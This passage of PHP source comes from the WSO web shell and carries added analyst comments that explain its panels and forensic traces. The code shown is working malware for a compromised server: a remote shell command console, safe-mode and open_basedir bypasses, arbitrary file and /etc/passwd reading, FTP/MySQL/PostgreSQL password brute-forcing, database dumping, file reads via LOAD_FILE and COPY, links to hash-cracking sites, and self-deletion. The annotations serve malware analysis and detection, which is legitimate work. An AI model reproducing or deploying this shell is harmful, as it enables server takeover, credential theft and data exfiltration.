1195 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1196 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1197 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1198 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1199 </table></form>";
1200
1201 function wsoRecursiveGlob($path) {
1202 if(substr($path, -1) != '/')
1203 $path.='/';
1204 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1205 if(is_array($paths)&&@count($paths)) {
1206 foreach($paths as $item) {
1207 if(@is_dir($item)){
1208 if($path!=$item)
1209 wsoRecursiveGlob($item);
1210 } else {
1211 if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
1212 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
1213 }
1214 }
1215 }
1216 }
1217 if(@$_POST['p3'])
1218 wsoRecursiveGlob($_POST['c']);
1219 echo "</div><br><h1>Search for hash:</h1><div class=content>
1220
1221 <form method='post' target='_blank' name='hf'>
1222 <input type='text' name='hash' style='width:200px;'><br>
1223 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1224 <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
1225 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
1226 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1227 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1228 </form></div>";
1229 wsoFooter();
1230}
1231
1232function actionFilesTools() {
1233 if( isset($_POST['p1']) )
1234 $_POST['p1'] = urldecode($_POST['p1']);
1235 if(@$_POST['p2']=='download') {
1236 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
1237 ob_start("ob_gzhandler", 4096);
1238 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1239 if (function_exists("mime_content_type")) {
1240 $type = @mime_content_type($_POST['p1']);
1241 header("Content-Type: " . $type);
1242 } else
1243 header("Content-Type: application/octet-stream");
1244 $fp = @fopen($_POST['p1'], "r");
1245 if($fp) {
1246 while(!@feof($fp))
1247 echo @fread($fp, 1024);
1248 fclose($fp);
1249 }
1250 }exit;
1251 }
1252 if( @$_POST['p2'] == 'mkfile' ) {
1253 if(!file_exists($_POST['p1'])) {
1254 $fp = @fopen($_POST['p1'], 'w');
1255 if($fp) {
1256 $_POST['p2'] = "edit";
1257 fclose($fp);
1258 }
1259 }
1260 }
1261 wsoHeader();
1262 echo '<h1>File tools</h1><div class=content>';
1263 if( !file_exists(@$_POST['p1']) ) {
1264 echo 'File not exists';
1265 wsoFooter();
1266 return;
1267 }
1268 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
1269 if(!$uid) {
1270 $uid['name'] = @fileowner($_POST['p1']);
1271 $gid['name'] = @filegroup($_POST['p1']);
1272 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
1273 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1274 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1275 if( empty($_POST['p2']) )
1276 $_POST['p2'] = 'view';
1277 if( is_file($_POST['p1']) )
1278 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
1279 else
1280 $m = array('Chmod', 'Rename', 'Touch');
1281 foreach($m as $v)
1282 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1283 echo '<br><br>';
1284 switch($_POST['p2']) {
1285 case 'view':
1286 echo '<pre class=ml1>';
1287 $fp = @fopen($_POST['p1'], 'r');
1288 if($fp) {
1289 while( !@feof($fp) )
1290 echo htmlspecialchars(@fread($fp, 1024));
1291 @fclose($fp);
1292 }
1293 echo '</pre>';
1294 break;
1295 case 'highlight':
1296 if( @is_readable($_POST['p1']) ) {
1297 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1298 $code = @highlight_file($_POST['p1'],true);
1299 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
1300 }
1301 break;
1302 case 'chmod':
1303 if( !empty($_POST['p3']) ) {
1304 $perms = 0;
1305 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1306 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
1307 if(!@chmod($_POST['p1'], $perms))
1308 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1309 }
1310 clearstatcache();
1311 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1312 break;
1313 case 'edit':
1314 if( !is_writable($_POST['p1'])) {
1315 echo 'File isn\'t writeable';
1316 break;
1317 }
1318 if( !empty($_POST['p3']) ) {
1319 $time = @filemtime($_POST['p1']);
1320 $_POST['p3'] = substr($_POST['p3'],1);
1321 $fp = @fopen($_POST['p1'],"w");
1322 if($fp) {
1323 @fwrite($fp,$_POST['p3']);
1324 @fclose($fp);
1325 echo 'Saved!<br><script>p3_="";</script>';
1326 @touch($_POST['p1'],$time,$time);
1327 }
1328 }
1329 echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1330 $fp = @fopen($_POST['p1'], 'r');
1331 if($fp) {
1332 while( !@feof($fp) )
1333 echo htmlspecialchars(@fread($fp, 1024));
1334 @fclose($fp);
1335 }
1336 echo '</textarea><input type=submit value=">>"></form>';
1337 break;
1338 case 'hexdump':
1339 $c = @file_get_contents($_POST['p1']);
1340 $n = 0;
1341 $h = array('00000000<br>','','');
1342 $len = strlen($c);
1343 for ($i=0; $i<$len; ++$i) {
1344 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1345 switch ( ord($c[$i]) ) {
1346 case 0: $h[2] .= ' '; break;
1347 case 9: $h[2] .= ' '; break;
1348 case 10: $h[2] .= ' '; break;
1349 case 13: $h[2] .= ' '; break;
1350 default: $h[2] .= $c[$i]; break;
1351 }
1352 $n++;
1353 if ($n == 32) {
1354 $n = 0;
1355 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1356 $h[1] .= '<br>';
1357 $h[2] .= "\n";
1358 }
1359 }
1360 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1361 break;
1362 case 'rename':
1363 if( !empty($_POST['p3']) ) {
1364 if(!@rename($_POST['p1'], $_POST['p3']))
1365 echo 'Can\'t rename!<br>';
1366 else
1367 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1368 }
1369 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1370 break;
1371 case 'touch':
1372 if( !empty($_POST['p3']) ) {
1373 $time = strtotime($_POST['p3']);
1374 if($time) {
1375 if(!touch($_POST['p1'],$time,$time))
1376 echo 'Fail!';
1377 else
1378 echo 'Touched!';
1379 } else echo 'Bad time format!';
1380 }
1381 clearstatcache();
1382 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1383 break;
1384 }
1385 echo '</div>';
1386 wsoFooter();
1387}
1388
// Analyst note: "Safe mode bypass" panel. Each branch takes a path from $_POST['p2'] and tries a
// different read primitive; the output is buffered and echoed under the forms as a <pre>.
function actionSafeMode() {
    $temp='';
    ob_start();
    switch($_POST['p1']) {
        case 1:
            // Read via copy() through the compress.zlib:// stream wrapper into a temp file.
            // $test is never assigned here, so tempnam() receives an empty directory argument.
            $temp=@tempnam($test, 'cx');
            if(@copy("compress.zlib://".$_POST['p2'], $temp)){
                echo @file_get_contents($temp);
                unlink($temp);
            } else
                echo 'Sorry... Can\'t open file';
            break;
        case 2:
            // Directory listing via glob() on the supplied prefix.
            $files = glob($_POST['p2'].'*');
            if( is_array($files) )
                foreach ($files as $filename)
                    echo $filename."\n";
            break;
        case 3:
            // Read via a cURL file:// URL; a NUL byte and this script's own path are appended.
            $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
            curl_exec($ch);
            break;
        case 4:
            // Resets safe_mode/open_basedir to their php.ini values, then include()s the path —
            // which also executes any PHP the included file contains.
            ini_restore("safe_mode");
            ini_restore("open_basedir");
            include($_POST['p2']);
            break;
        case 5:
            // Account enumeration over a UID range via posix_getpwuid() (equivalent to /etc/passwd).
            for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
                $uid = @posix_getpwuid($_POST['p2']);
                if ($uid)
                    echo join(':',$uid)."\n";
            }
            break;
    }
    $temp = ob_get_clean();
    wsoHeader();
    echo '<h1>Safe mode bypass</h1><div class=content>';
    echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
    if($temp)
        echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
    echo '</div>';
    wsoFooter();
}
1433
// Analyst note: interactive command console. The command arrives in $_POST['p1'] and is passed to
// wsoEx() (defined elsewhere in the file); the ' 2>&1' appended below indicates it appears to run
// through a shell. Per-host state lives in $_SESSION under keys prefixed with
// md5($_SERVER['HTTP_HOST']) — a recognisable artifact in PHP session files.
function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        // p2 = "redirect stderr to stdout" checkbox; the choice is remembered in the session.
        $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;

    if(isset($_POST['ajax'])) {
        // AJAX mode: the response body is "<length>\n<javascript>", where the script appends the
        // escaped command echo plus output to the page's textarea.
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
        ob_start();
        echo "d.cf.cmd.value='';\n";
        $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
        // A trailing "cd <dir>" also chdir()s the PHP process and updates the global cwd, so later
        // requests keep operating in that directory.
        if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
            if(@chdir($match[1])) {
                $GLOBALS['cwd'] = @getcwd();
                echo "c_='".$GLOBALS['cwd']."';";
            }
        }
        echo "d.cf.output.value+='".$temp."';";
        echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
        $temp = ob_get_clean();
        echo strlen($temp), "\n", $temp;
        exit;
    }
    wsoHeader();
    // Literal client-side JS: arrow-key command history for the console input.
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
 var n = (window.Event) ? e.which : e.keyCode;
 if(n == 38) {
 cur--;
 if(cur>=0)
 document.cf.cmd.value = cmds[cur];
 else
 cur++;
 } else if(n == 40) {
 cur++;
 if(cur < cmds.length)
 document.cf.cmd.value = cmds[cur];
 else
 cur--;
 }
}
function add(cmd) {
 cmds.pop();
 cmds.push(cmd);
 cmds.push('');
 cur = cmds.length-1;
}

</script>";
    echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
    // $GLOBALS['aliases'] (defined elsewhere in the file) fills the preset-command dropdown; an
    // empty value marks a group heading.
    foreach($GLOBALS['aliases'] as $n => $v) {
        if($v == '') {
            echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
            continue;
        }
        echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
    }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
        $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
    echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
    // Non-AJAX path: the command is executed here and its output rendered into the textarea.
    if(!empty($_POST['p1'])) {
        echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
    }
    echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
    echo '</form></div><script>d.cf.cmd.focus();</script>';
    wsoFooter();
}
1505
// Destroys the PHP session (the shell's authenticated state) and ends the response with 'bye!'.
function actionLogout() {
    session_destroy();
    die('bye!');
}
1510
// Analyst note: self-deletion ("Suicide"). With p1 == 'yes' the script unlinks its own file; the
// regex strips a "(N) ..." suffix from __FILE__, as would be present if the code were running
// from eval()'d source. Without confirmation it renders the Yes link. Only wsoHeader() is
// conditional; the body and footer are printed in every non-deleted case.
function actionSelfRemove() {

    if($_POST['p1'] == 'yes')
        if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
            die('Shell has been removed');
        else
            echo 'unlink error!';
    if($_POST['p1'] != 'yes')
        wsoHeader();
    echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
    wsoFooter();
}
1523
// Analyst note: credential-guessing panel for FTP, MySQL and PostgreSQL. bruteForce() is defined
// conditionally per protocol; every attempt is a fresh connection from the web server's own
// address, so a burst of failed logins sourced from the web host is the network-side signal.
function actionBruteforce() {
    wsoHeader();
    if( isset($_POST['proto']) ) {
        echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
        if( $_POST['proto'] == 'ftp' ) {
            // FTP: connect + login per attempt; port defaults to 21.
            function bruteForce($ip,$port,$login,$pass) {
                $fp = @ftp_connect($ip, $port?$port:21);
                if(!$fp) return false;
                $res = @ftp_login($fp, $login, $pass);
                @ftp_close($fp);
                return $res;
            }
        } elseif( $_POST['proto'] == 'mysql' ) {
            // MySQL via the legacy mysql_* extension (removed in PHP 7.0).
            function bruteForce($ip,$port,$login,$pass) {
                $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
                @mysql_close($res);
                return $res;
            }
        } elseif( $_POST['proto'] == 'pgsql' ) {
            // PostgreSQL: connection string built from the raw inputs, always against dbname=postgres.
            function bruteForce($ip,$port,$login,$pass) {
                $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
                $res = @pg_connect($str);
                @pg_close($res);
                return $res;
            }
        }
        $success = 0;
        $attempts = 0;
        $server = explode(":", $_POST['server']);
        if($_POST['type'] == 1) {
            // Mode 1: each local account name from /etc/passwd is tried as its own password,
            // and (with the "reverse" checkbox) as that name reversed.
            $temp = @file('/etc/passwd');
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = explode(":", $line);
                    ++$attempts;
                    if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
                    }
                    if(@$_POST['reverse']) {
                        $tmp = "";
                        for($i=strlen($line[0])-1; $i>=0; --$i)
                            $tmp .= $line[0][$i];
                        ++$attempts;
                        if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
                            $success++;
                            echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
                        }
                    }
                }
        } elseif($_POST['type'] == 2) {
            // Mode 2: a single login against every line of a wordlist file read from the server
            // filesystem ($_POST['dict']; the form defaults it to <cwd>passwd.dic).
            $temp = @file($_POST['dict']);
            if( is_array($temp) )
                foreach($temp as $line) {
                    $line = trim($line);
                    ++$attempts;
                    if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
                        $success++;
                        echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
                    }
                }
        }
        echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
    }
    // Form defaults: server 127.0.0.1, login root, mode 1 with reverse enabled.
    echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
        .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
        .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
        .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
        .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
        .'<span>Server:port</span></td>'
        .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
        .'<tr><td><span>Brute type</span></td>'
        .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
        .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
        .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
        .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
        .'<td><input type=text name=login value="root"></td></tr>'
        .'<tr><td><span>Dictionary</span></td>'
        .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
        .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
    echo '</div><br>';
    wsoFooter();
}
1607
// Analyst note: SQL browser. A throwaway DbClass (PHP 4-style constructor, legacy mysql_* and
// pg_* calls) wraps the connection; credentials come straight from $_POST['sql_host'],
// 'sql_login', 'sql_pass', 'sql_base'. Besides browsing, it dumps tables (to the browser or to a
// file on the server) and reads server files through the database (LOAD_FILE / COPY).
// mysql_* was removed in PHP 7.0 and each() in PHP 8.0, so this panel only fully works on PHP 5.
function actionSql() {
    class DbClass {
        var $type;   // 'mysql' or 'pgsql', taken from $_POST['type']
        var $link;   // connection resource
        var $res;    // last result resource
        function DbClass($type) {
            $this->type = $type;
        }
        // Opens the connection. For pgsql, "host:port" is split and the port defaults to 5432.
        function connect($host, $user, $pass, $dbname){
            switch($this->type) {
                case 'mysql':
                    if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
                    break;
                case 'pgsql':
                    $host = explode(':', $host);
                    if(!$host[1]) $host[1]=5432;
                    if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
                    break;
            }
            return false;
        }
        // mysql only; pgsql selects the database at connect time.
        function selectdb($db) {
            switch($this->type) {
                case 'mysql':
                    if (@mysql_select_db($db))return true;
                    break;
            }
            return false;
        }
        // Runs a raw statement and stores the result in $this->res.
        function query($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->res = @mysql_query($str);
                    break;
                case 'pgsql':
                    return $this->res = @pg_query($this->link,$str);
                    break;
            }
            return false;
        }
        // Fetches one associative row from the given result, or from $this->res if none is passed.
        function fetch() {
            $res = func_num_args()?func_get_arg(0):$this->res;
            switch($this->type) {
                case 'mysql':
                    return @mysql_fetch_assoc($res);
                    break;
                case 'pgsql':
                    return @pg_fetch_assoc($res);
                    break;
            }
            return false;
        }
        function listDbs() {
            switch($this->type) {
                case 'mysql':
                    return $this->query("SHOW databases");
                    break;
                case 'pgsql':
                    return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
                    break;
            }
            return false;
        }
        function listTables() {
            switch($this->type) {
                case 'mysql':
                    return $this->res = $this->query('SHOW TABLES');
                    break;
                case 'pgsql':
                    return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
                    break;
            }
            return false;
        }
        function error() {
            switch($this->type) {
                case 'mysql':
                    return @mysql_error();
                    break;
                case 'pgsql':
                    return @pg_last_error();
                    break;
            }
            return false;
        }
        function setCharset($str) {
            switch($this->type) {
                case 'mysql':
                    if(function_exists('mysql_set_charset'))
                        return @mysql_set_charset($str, $this->link);
                    else
                        $this->query('SET CHARSET '.$str);
                    break;
                case 'pgsql':
                    return @pg_set_client_encoding($this->link, $str);
                    break;
            }
            return false;
        }
        // Reads a server-side file through the DB engine. mysql: LOAD_FILE(). pgsql: creates a
        // scratch table named wso2, COPYs the file into it, reads it back and drops it — if the
        // drop fails, a leftover "wso2" table is a database-side artifact of this shell.
        function loadFile($str) {
            switch($this->type) {
                case 'mysql':
                    return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
                    break;
                case 'pgsql':
                    $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
                    $r=array();
                    while($i=$this->fetch())
                        $r[] = $i['file'];
                    $this->query('drop table wso2');
                    return array('file'=>implode("\n",$r));
                    break;
            }
            return false;
        }
        // Emits a table as SQL (CREATE TABLE + INSERTs for mysql, INSERTs only for pgsql), either
        // to the open file handle $fp or directly to the response.
        function dump($table, $fp = false) {
            switch($this->type) {
                case 'mysql':
                    $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
                    $create = mysql_fetch_array($res);
                    $sql = $create[1].";\n";
                    if($fp) fwrite($fp, $sql); else echo($sql);
                    $this->query('SELECT * FROM `'.$table.'`');
                    $head = true;
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            if($v == null)
                                $item[$k] = "NULL";
                            elseif(is_numeric($v))
                                $item[$k] = $v;
                            else
                                $item[$k] = "'".@mysql_real_escape_string($v)."'";
                            $columns[] = "`".$k."`";
                        }
                        if($head) {
                            $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
                            $head = false;
                        } else
                            $sql = "\n\t,(".implode(", ", $item).')';
                        if($fp) fwrite($fp, $sql); else echo($sql);
                    }
                    if(!$head)
                        if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
                    break;
                case 'pgsql':
                    $this->query('SELECT * FROM '.$table);
                    while($item = $this->fetch()) {
                        $columns = array();
                        foreach($item as $k=>$v) {
                            $item[$k] = "'".addslashes($v)."'";
                            $columns[] = $k;
                        }
                        $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
                        if($fp) fwrite($fp, $sql); else echo($sql);
                    }
                    break;
            }
            return false;
        }
    };
    $db = new DbClass($_POST['type']);
    // Dump path: either streamed to the browser as an attachment named dump.sql, or written to
    // $_POST['file'] on the server (the form defaults this to dump.sql in the current directory).
    if(@$_POST['p2']=='download') {
        $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
        $db->selectdb($_POST['sql_base']);
        switch($_POST['charset']) {
            case "Windows-1251": $db->setCharset('cp1251'); break;
            case "UTF-8": $db->setCharset('utf8'); break;
            case "KOI8-R": $db->setCharset('koi8r'); break;
            case "KOI8-U": $db->setCharset('koi8u'); break;
            case "cp866": $db->setCharset('cp866'); break;
        }
        if(empty($_POST['file'])) {
            ob_start("ob_gzhandler", 4096);
            header("Content-Disposition: attachment; filename=dump.sql");
            header("Content-Type: text/plain");
            foreach($_POST['tbl'] as $v)
                $db->dump($v);
            exit;
        } elseif($fp = @fopen($_POST['file'], 'w')) {
            foreach($_POST['tbl'] as $v)
                $db->dump($v, $fp);
            fclose($fp);
            unset($_POST['p2']);
        } else
            die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
    }
    wsoHeader();
    echo "

<h1>Sql browser</h1><div class=content>
<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
<td><select name='type'><option value='mysql' ";
    if(@$_POST['type']=='mysql')echo 'selected';
    echo ">MySql</option><option value='pgsql' ";
    if(@$_POST['type']=='pgsql')echo 'selected';
    echo ">PostgreSql</option></select></td>
<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
    $tmp = "<input type=text name=sql_base value=''>";
    // Once a host is posted, connect and replace the free-text database field with a dropdown.
    if(isset($_POST['sql_host'])){
        if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
            switch($_POST['charset']) {
                case "Windows-1251": $db->setCharset('cp1251'); break;
                case "UTF-8": $db->setCharset('utf8'); break;
                case "KOI8-R": $db->setCharset('koi8r'); break;
                case "KOI8-U": $db->setCharset('koi8u'); break;
                case "cp866": $db->setCharset('cp866'); break;
            }
            $db->listDbs();
            echo "<select name=sql_base><option value=''></option>";
            while($item = $db->fetch()) {
                list($key, $value) = each($item);
                echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
            }
            echo '</select>';
        }
        else echo $tmp;
    }else
        echo $tmp;
    // Literal client-side JS: fs() clears p1/p2/p3 when the database changes, st() requests a
    // table page, is() inverts the table checkboxes used for dumping.
    echo "</td>

 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
 </tr>
 </table>
 <script>
 s_db='".@addslashes($_POST['sql_base'])."';
 function fs(f) {
 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
 if(f.p1) f.p1.value='';
 if(f.p2) f.p2.value='';
 if(f.p3) f.p3.value='';
 }
 }
 function st(t,l) {
 d.sf.p1.value = 'select';
 d.sf.p2.value = t;
 if(l && d.sf.p3) d.sf.p3.value = l;
 d.sf.submit();
 }
 function is() {
 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
 }
 </script>";
    if(isset($db) && $db->link){
        echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
        if(!empty($_POST['sql_base'])){
            $db->selectdb($_POST['sql_base']);
            echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
            $tbls_res = $db->listTables();
            while($item = $db->fetch($tbls_res)) {
                list($key, $value) = each($item);
                if(!empty($_POST['sql_count']))
                    $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
                $value = htmlspecialchars($value);
